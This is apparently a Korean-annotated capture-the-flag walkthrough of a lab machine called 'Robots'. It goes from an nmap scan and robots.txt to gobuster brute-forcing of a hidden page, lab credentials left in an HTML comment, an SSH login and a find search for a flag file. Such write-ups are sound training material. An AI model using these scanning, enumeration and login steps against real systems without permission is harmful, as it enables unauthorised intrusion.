[Robots]
# SYN(stealth) 스캔(-sS)과 타이밍 템플릿 T4(-T4, 스레드 수가 아니라 스캔 속도 설정)로 정보 수집
sudo nmap 10.10.124.31 -sS -T4
sudo nmap 10.10.124.31 -sV -T4 -sC -p 22,80
# -sV : 서비스 버전 확인
# -sC : 기본 NSE 스크립트 실행
---------------------
PORT STATE SERVICE
---------------------
22/tcp open ssh
80/tcp open http
---------------------
# 웹 사이트 실행
http://10.10.124.31:80
# robots.txt 확인 (Disallow는 크롤러용 안내일 뿐 접근 제어가 아니므로, 숨기려는 경로가 그대로 노출됨)
http://10.10.124.31:80/robots.txt
------------------------
User-agent: *
Allow: /index.php
Disallow: /admin.html
------------------------
# admin.html 검색
http://10.10.124.31:80/admin.html
----------------------------------------------------
Admin Page
To find the real admin page,
look for a XXXX.hv.html file in this web server,
where XXXX is a 4-digit number.
----------------------------------------------------
# 0000~9999.hv.html (4자리, 앞자리 0 포함) wordlist 제작 — '>>'는 이어쓰기이므로 다시 실행하면 항목이 중복됨
for i in {0000..9999} ; do echo $i.hv.html >> wordlist.txt; done
# wordlist를 사용해서 http://10.10.124.31에 gobuster dir 모드로 파일명 열거 실행 (-t 100 : 동시 스레드 100개)
gobuster dir -u http://10.10.124.31 -w wordlist.txt -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.124.31
[+] Method: GET
[+] Threads: 100
[+] Wordlist: wordlist.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/7289.hv.html (Status: 200) [Size: 653]
Progress: 10000 / 10001 (99.99%)
===============================================================
Finished
===============================================================
# http://10.10.124.31/7289.hv.html 실행 및 페이지 소스코드 보기
-----------------------------------
# 페이지 소스의 HTML 주석에 남아 있던 계정 정보 (username : password)
<!-- secret:HV-NOPERS-1337!! -->
# flag
<!-- GROOT{WH4T_S3CRETS_LUL} -->
-----------------------------------
# 알아낸 id와 pw로 ssh 접속하기
ssh secret@10.10.124.31
# 리스트 확인
$ ls -alh
-----------------------------------------------------------
-rwxrwxrwx 1 root root 88 Mar 11 2023 .roothint.lmao
-----------------------------------------------------------
# hint 파일 확인하기
$ cat .roothint.lmao
-------------------------------------------------------------------
how did you get in here? Bet you won't find the secret file though. < secrets.txt >
-------------------------------------------------------------------
# 'secrets.txt' 파일을 찾는 과정에서 발생하는 오류 메시지(stderr, 예: 권한 거부)는 /dev/null로 보내 출력에서 제외
$ find / -name "secrets.txt" 2>/dev/null
--------------------------
/etc/apache2/secrets.txt
--------------------------
$ cat /etc/apache2/secrets.txt
------------------------------------------------------
GROOT{WELCOME_TO_THE_HONEYPOT_WE_ARE_GOING_TO_GET_YOU}
------------------------------------------------------